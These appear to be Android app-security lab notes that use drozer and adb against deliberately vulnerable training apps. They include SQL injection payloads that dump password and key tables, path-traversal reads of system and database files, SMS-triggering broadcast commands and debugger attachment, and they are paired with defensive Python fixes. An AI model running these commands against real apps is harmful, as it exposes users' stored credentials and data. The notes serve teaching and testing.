- starting a drozer session
- $ adb forward tcp:31415 tcp:31415
- connecting the drozer console
- $ drozer console connect
- Retrieving Package Information
- dz> run app.package.list -f sieve
- We can ask drozer to provide some basic information about the package using the `app.package.info` command
- dz> run app.package.info -a com.mwr.example.sieve
- Identify the Attack Surface
- dz> run app.package.attacksurface com.mwr.example.sieve
- Launching Activities
- dz> run app.activity.info -a com.mwr.example.sieve
- Package: com.mwr.example.sieve
- com.mwr.example.sieve.FileSelectActivity
- com.mwr.example.sieve.MainLoginActivity
- com.mwr.example.sieve.PWList
- Since this activity is exported and does not require any permission, we can ask drozer to launch it:
- dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
- Reading from Content Providers
- dz> run app.provider.info -a com.mwr.example.sieve
- Database-backed Content Providers (Data Leakage)
- drozer provides a scanner module that brings together various ways to guess paths and divine a list of accessible content URIs:
- dz> run scanner.provider.finduris -a com.mwr.example.sieve
- Scanning com.mwr.example.sieve...
- Unable to Query content://com.mwr.example.sieve.DBContentProvider/ ...
- Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
- Accessible content URIs:
- content://com.mwr.example.sieve.DBContentProvider/Keys/
- content://com.mwr.example.sieve.DBContentProvider/Passwords
- content://com.mwr.example.sieve.DBContentProvider/Passwords/
- We can now use other drozer modules to retrieve information from those content URIs, or even modify the data in the database:
- dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
- id: 1
- service: Email
- username: incognitoguy50
- password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== (Base64-encoded)
- email: incognitoguy50@gmail.com
- Database-backed Content Providers (SQL Injection)
- dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
- dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
- Android returns a very verbose error message, showing the entire query that it tried to execute.
- We can fully exploit this vulnerability to list all tables in the database:
- dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
- dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
- File System-backed Content Providers
- dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
- to dump the database to the local machine
- dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
- Content Provider Vulnerabilities
- dz> run scanner.provider.injection -a com.mwr.example.sieve
- Scanning com.mwr.example.sieve...
- Injection in Projection:
- content://com.mwr.example.sieve.DBContentProvider/Keys/
- content://com.mwr.example.sieve.DBContentProvider/Passwords
- content://com.mwr.example.sieve.DBContentProvider/Passwords/
- Injection in Selection:
- content://com.mwr.example.sieve.DBContentProvider/Keys/
- content://com.mwr.example.sieve.DBContentProvider/Passwords
- content://com.mwr.example.sieve.DBContentProvider/Passwords/
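- Sieve's DBContentProvider splices the caller-supplied projection and selection straight into the SQL string, which is what the `--projection "* FROM ..."` queries above and the scanner.provider.injection findings rely on. The following is an added example, not Sieve's code and not drozer output: it reproduces that concatenation against a constructed in-memory SQLite schema (the table names, columns and row are assumed for the demo) and sets the hardened form beside it, where an allow-list plays the role of SQLiteQueryBuilder's projection map and the selection is bound as parameters instead of being appended to the query.

```python
import sqlite3


def make_db():
    """Constructed stand-in for Sieve's Passwords/Key tables (assumed schema)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE Passwords (id INTEGER PRIMARY KEY, service TEXT, username TEXT,
                                password TEXT, email TEXT);
        CREATE TABLE Key (Password TEXT, pin TEXT);
        INSERT INTO Passwords VALUES (1, 'Email', 'incognitoguy50',
                                      'PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==', 'incognitoguy50@gmail.com');
        INSERT INTO Key VALUES ('constructed-master-password', '1234');
    """)
    return con


def vulnerable_query(con, projection, selection=None):
    """The injectable pattern: projection and selection are concatenated into
    the SQL text. A projection ending in "--" comments out the rest of the
    template, so "* FROM Key--" reads a different table entirely."""
    sql = "SELECT " + ", ".join(projection) + " FROM Passwords"
    if selection:
        sql += " WHERE " + selection
    return con.execute(sql).fetchall()


# Hardened form. The map is the only way a caller-visible name reaches the SQL;
# "password" is deliberately absent, so it cannot be selected through the provider.
PROJECTION_MAP = {"id": "id", "service": "service", "username": "username", "email": "email"}


def hardened_query(con, projection, selection=None):
    """projection: list of caller-visible column names, each must be in PROJECTION_MAP.
    selection: dict of column -> value, turned into "col = ?" with bound parameters."""
    if not projection:
        raise ValueError("empty projection")
    cols = []
    for name in projection:
        if name not in PROJECTION_MAP:      # rejects "* FROM Key--" and unexposed columns
            raise ValueError("column not exposed: %r" % name)
        cols.append(PROJECTION_MAP[name])
    sql = "SELECT " + ", ".join(cols) + " FROM Passwords"
    args = []
    if selection:
        clauses = []
        for col, value in selection.items():
            if col not in PROJECTION_MAP:
                raise ValueError("cannot filter on %r" % col)
            clauses.append(PROJECTION_MAP[col] + " = ?")
            args.append(value)                # value never touches the SQL text
        sql += " WHERE " + " AND ".join(clauses)
    return con.execute(sql, args).fetchall()


if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", vulnerable_query(con, ["* FROM SQLITE_MASTER WHERE type='table'--"]))
    print("hardened:  ", hardened_query(con, ["service", "username"], {"service": "Email"}))
```

- With the vulnerable builder, a bare `'` in the selection surfaces the SQLite parse error with the full statement, which is the verbose error message described above; the hardened builder never reaches SQLite with caller text, so the same input simply matches no row.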
- to test for LFI / file path traversal, i.e. reading local files through vulnerable content providers in the app
- dz> run scanner.provider.traversal -a com.mwr.example.sieve
- Scanning com.mwr.example.sieve...
- Vulnerable Providers:
- content://com.mwr.example.sieve.FileBackupProvider/
- content://com.mwr.example.sieve.FileBackupProvider
- to read a file through the vulnerable provider
- dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
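- FileBackupProvider opens whatever path follows the authority, which is why /etc/hosts and the app's own database.db come back through it. Added example, not Sieve's code: the check a file-backed provider should make before opening anything, namely canonicalise the requested path under a fixed export root and refuse it if it resolves anywhere else. Canonicalising first also catches a symlink inside the export directory that points outside it. The export root and file names are assumed.

```python
import os
import tempfile


def resolve_export_path(export_dir, requested):
    """Map a provider URI path (the part after the authority) onto export_dir,
    refusing anything that resolves outside it. Same idea as canonicalising a
    File in openFile() and checking it still starts with the export root."""
    base = os.path.realpath(export_dir)
    # os.path.join() discards base for an absolute request such as "/etc/hosts",
    # so an absolute path is reinterpreted as relative to the export root.
    candidate = os.path.realpath(os.path.join(base, requested.lstrip("/")))
    # realpath() has already collapsed ".." and followed symlinks; commonpath()
    # compares whole components, so "/srv/export2" does not pass as "/srv/export".
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError("request escapes export directory: %r" % requested)
    return candidate


def is_allowed(export_dir, requested):
    """True/False wrapper around resolve_export_path()."""
    try:
        resolve_export_path(export_dir, requested)
        return True
    except PermissionError:
        return False


def symlink_escape_is_blocked():
    """Constructed fixture: a throwaway export dir containing a symlink to /etc.
    Returns True when a request routed through that link is refused."""
    export_dir = tempfile.mkdtemp(prefix="export-")
    os.symlink("/etc", os.path.join(export_dir, "leak"))
    return not is_allowed(export_dir, "leak/hosts")


if __name__ == "__main__":
    root = "/data/data/com.example.constructed/files"   # assumed export root
    for req in ("backup.db", "/etc/hosts", "../../../../etc/hosts", "sub/../backup.db"):
        print("%-26s -> %s" % (req, "allowed" if is_allowed(root, req) else "blocked"))
    print("symlink escape blocked:", symlink_escape_is_blocked())
```

- Note that "/etc/hosts" is still accepted, but it now means `<export root>/etc/hosts`, a file the provider owns; only the `..` and symlink routes to the real /etc/hosts are refused.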
- Interacting with Services
- dz> run app.service.info -a com.mwr.example.sieve
- Unintended Data Leakage
- pidcat
- $ pidcat com.mwr.example.sieve
- Insecure Data Storage
- root@cancro:/data/data/com.jianguo.funcontrol/shared_prefs # ls -al
- ls -al
- -rw-rw---- u0_a216 u0_a216 124 2015-12-19 13:51 AGREE_PROTOCOL.xml
- -rw-rw---- u0_a216 u0_a216 799 2016-02-06 18:42 CoreServicePrefs.xml
- -rw-rw---- u0_a216 u0_a216 127 2016-01-31 17:09 WebViewChromiumPrefs.xml
- -rw-rw---- u0_a216 u0_a216 226 2016-02-06 17:09 com.iflytek.msc.xml
- -rw-rw---- u0_a216 u0_a216 133 2016-01-31 17:09 com.jianguo.funcontrol_preferences.xml
- -rw-rw---- u0_a216 u0_a216 72801 2016-02-06 17:09 moive.sp.xml
- -rw-rw---- u0_a216 u0_a216 942 2016-02-06 18:42 umeng_general_config.xml
- root@cancro:/data/data/com.mwr.example.sieve # ls -al
- ls -al
- drwxrwx--x u0_a188 u0_a188 2015-08-03 20:51 cache
- drwxrwx--x u0_a188 u0_a188 2016-06-30 00:02 code_cache
- drwxrwx--x u0_a188 u0_a188 2014-08-01 22:32 databases
- lrwxrwxrwx root root 2016-06-29 22:36 lib -> /data/app-lib/com.mwr.example.sieve-1
- Insufficient Transport Layer Protection
- Burp Suite
- Unintended Data Leakage
- # String enetered: 123456
- pidcat com.mwr.example.sieve
- root@ubuntu:~# pidcat.py com.mwr.example.sieve
- art I Late-enabling -Xcheck:jni
- BoostFramework V mAcquireFunc method = public int com.qualcomm.qti.Performance.perfLockAcquire(int,int[])
- V mReleaseFunc method = public int com.qualcomm.qti.Performance.perfLockRelease()
- V mAcquireTouchFunc method = public int com.qualcomm.qti.Performance.perfLockAcquireTouch(android.view.MotionEvent,android.util.DisplayMetrics,int,int[])
- V mIOPStart method = public int com.qualcomm.qti.Performance.perfIOPrefetchStart(int,java.lang.String)
- V mIOPStop method = public int com.qualcomm.qti.Performance.perfIOPrefetchStop()
- V BoostFramework() : mPerf = com.qualcomm.qti.Performance@817a13
- V BoostFramework() : mPerf = com.qualcomm.qti.Performance@804f450
- OpenGLRenderer D Use EGL_SWAP_BEHAVIOR_PRESERVED: true
- Adreno-EGL I <qeglDrvAPI_eglInitialize:379>: EGL 1.4 QUALCOMM build: Nondeterministic_AU_msm8974_LA.BF.1.1.3_RB1__release_AU (Ia10634f51b)
- I OpenGL ES Shader Compiler Version: E031.29.00.00
- I Build Date: 01/10/16 Sun
- I Local Branch: mybranch17687478
- I Remote Branch: quic/LA.BF.1.1.3_rb1.8
- I Local Patches: NONE
- I Reconstruct Branch: NOTHING
- OpenGLRenderer I Initialized EGL, version 1.4
- ActivityThread D Loading provider com.mwr.example.sieve.DBContentProvider: com.mwr.example.sieve.DBContentProvider
- m_MainLogin D String enetered: 123456
- Timeline I Timeline: Activity_launch_request time:7110102
- BoostFramework V BoostFramework() : mPerf = com.qualcomm.qti.Performance@c941a0f
- Attacking Services
- dz> run app.service.info --package org.owasp.goatdroid.fourgoats
- Package: org.owasp.goatdroid.fourgoats
- org.owasp.goatdroid.fourgoats.services.LocationService
- Permission: null
- Attacking Activities
- List the exported components declared in the AndroidManifest.xml file
- dz> run app.activity.info -a org.owasp.goatdroid.fourgoats -u
- Package: org.owasp.goatdroid.fourgoats
- Exported Activities:
- org.owasp.goatdroid.fourgoats.activities.Main
- org.owasp.goatdroid.fourgoats.activities.ViewCheckin
- org.owasp.goatdroid.fourgoats.activities.ViewProfile
- org.owasp.goatdroid.fourgoats.activities.SocialAPIAuthentication
- Activate the component
- dz> run app.activity.start --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.activities.ViewProfile
- Attacking Broadcast Receivers
- dz> run app.broadcast.info --package org.owasp.goatdroid.fourgoats
- Package: org.owasp.goatdroid.fourgoats
- org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver
- Permission: null
- If you look in the AndroidManifest.xml file of the FourGoats application, you will find the action name org.owasp.goatdroid.fourgoats.SOCIAL_SMS and the component name org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver, so set these parameters in drozer accordingly.
- dz> run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234 --extra string message "it's test"
- or directly use
- adb shell
- am broadcast -a theBroadcast -n com.android.insecurebankv2/com.android.insecurebankv2.MyBroadCastReceiver --es phonenumber 5554 --es newpass qwreet@123!
- Exploiting Debuggable Applications
- $ adb jdwp
- 347
- 602
- 710
- 724
- 737
- 811
- 929
- 1202
- 1320
- 1362
- 1383
- 1405
- 1931
- 2022
- 2207
- 2222
- 2239
- 2253
- 2269
- 2283
- 2310
- $ adb shell ps | grep '1931'
- u0_a59 1931 177 572536 33484 ffffffff b769007b S com.mwr.example.sieve:remote
- C:\Users\syandava\Desktop\sieve\dist
- $ adb shell ps | grep sieve
- u0_a59 1320 177 570756 43612 ffffffff b769007b S com.mwr.example.sieve
- u0_a59 1931 177 572536 33484 ffffffff b769007b S com.mwr.example.sieve:remote
- $ adb shell
- root@vbox86p:/ # run-as com.mwr.example.sieve
- run-as com.mwr.example.sieve
- root@vbox86p:/data/data/com.mwr.example.sieve $ ls -l
- ls -l
- drwxrwx--x u0_a59 u0_a59 2017-12-05 06:24 cache
- drwxrwx--x u0_a59 u0_a59 2017-12-05 06:24 databases
- lrwxrwxrwx install install 2017-12-05 22:42 lib -> /data/app-lib/com.mwr.example.sieve-1
- root@vbox86p:/data/data/com.mwr.example.sieve $ exit
- exit
- root@vbox86p:/ # exit
- exit
- C:\Users\syandava\Desktop\sieve\dist
- $ adb shell run-as com.mwr.example.sieve /data/data/
- run-as: exec failed for /data/data/ Error:Permission denied
- Some other ways
- $ adb jdwp
- Next we'll need to forward our debugging session to a port we can connect to with our debugger:
- $ adb forward tcp:8000 jdwp:498
- Finally we can attach the debugger with:
- $ jdb -connect com.sun.jdi.SocketAttach:hostname=localhost,port=8000
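- Everything drozer reported above (exported activities, services, receivers and providers with Permission: null, and a process that shows up in adb jdwp) is declared in the manifest, so the same findings can be pulled out of AndroidManifest.xml before the build ships. Added example, not drozer's code and not any real app's manifest: a small linter over a constructed manifest that flags android:debuggable="true" and every component reachable from other apps without a permission guarding it. The package name, component names and permission names are made up; the rule that a component without android:exported is exported when it has an intent-filter is assumed to hold for all four component types.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

# Constructed manifest for illustration only; package and components are made up.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.constructed">
  <application android:debuggable="true">
    <activity android:name=".MainLoginActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".PWList" android:exported="true"/>
    <activity android:name=".Settings" android:exported="false"/>
    <service android:name=".AuthService" android:exported="true"
             android:permission="com.example.constructed.USE_AUTH"/>
    <receiver android:name=".SendSMSNowReceiver">
      <intent-filter>
        <action android:name="com.example.constructed.SOCIAL_SMS"/>
      </intent-filter>
    </receiver>
    <provider android:name=".DBContentProvider"
              android:authorities="com.example.constructed.DBContentProvider"
              android:exported="true"
              android:readPermission="com.example.constructed.READ_DB"/>
    <provider android:name=".FileBackupProvider"
              android:authorities="com.example.constructed.FileBackupProvider"
              android:exported="true"
              android:permission="com.example.constructed.BACKUP"/>
  </application>
</manifest>
"""


def is_exported(elem):
    """android:exported wins when present; otherwise a component that declares
    an intent-filter is reachable from other apps (assumed rule for all types)."""
    explicit = elem.get(ANDROID + "exported")
    if explicit is not None:
        return explicit == "true"
    return elem.find("intent-filter") is not None


def is_launcher(elem):
    """The launcher activity has to be exported, so it is not a finding."""
    return any(c.get(ANDROID + "name") == "android.intent.category.LAUNCHER"
               for c in elem.iter("category"))


def is_protected(elem):
    """A provider needs android:permission or both read and write permissions;
    a readPermission alone leaves insert/update/delete open. Other components
    need android:permission."""
    perm = elem.get(ANDROID + "permission")
    if elem.tag != "provider":
        return bool(perm)
    read = elem.get(ANDROID + "readPermission")
    write = elem.get(ANDROID + "writePermission")
    return bool(perm) or bool(read and write)


def lint_manifest(xml_text):
    """Returns (finding, subject) tuples: the debuggable flag plus every
    component exported without a permission guarding it."""
    root = ET.fromstring(xml_text)
    pkg = root.get("package")
    app = root.find("application")
    findings = []
    if app.get(ANDROID + "debuggable") == "true":
        findings.append(("debuggable", pkg))
    for tag in COMPONENT_TAGS:
        for elem in app.iter(tag):
            name = elem.get(ANDROID + "name")
            if name.startswith("."):          # expand the relative class-name shorthand
                name = pkg + name
            if is_launcher(elem):
                continue
            if is_exported(elem) and not is_protected(elem):
                findings.append(("unprotected_" + tag, name))
    return findings


if __name__ == "__main__":
    for kind, subject in lint_manifest(SAMPLE_MANIFEST):
        print("%-22s %s" % (kind, subject))
```

- On the constructed manifest this reports the debuggable flag, PWList, SendSMSNowReceiver and DBContentProvider (read-guarded but writable), and stays quiet about Settings (exported="false"), AuthService and FileBackupProvider (both guarded by a permission).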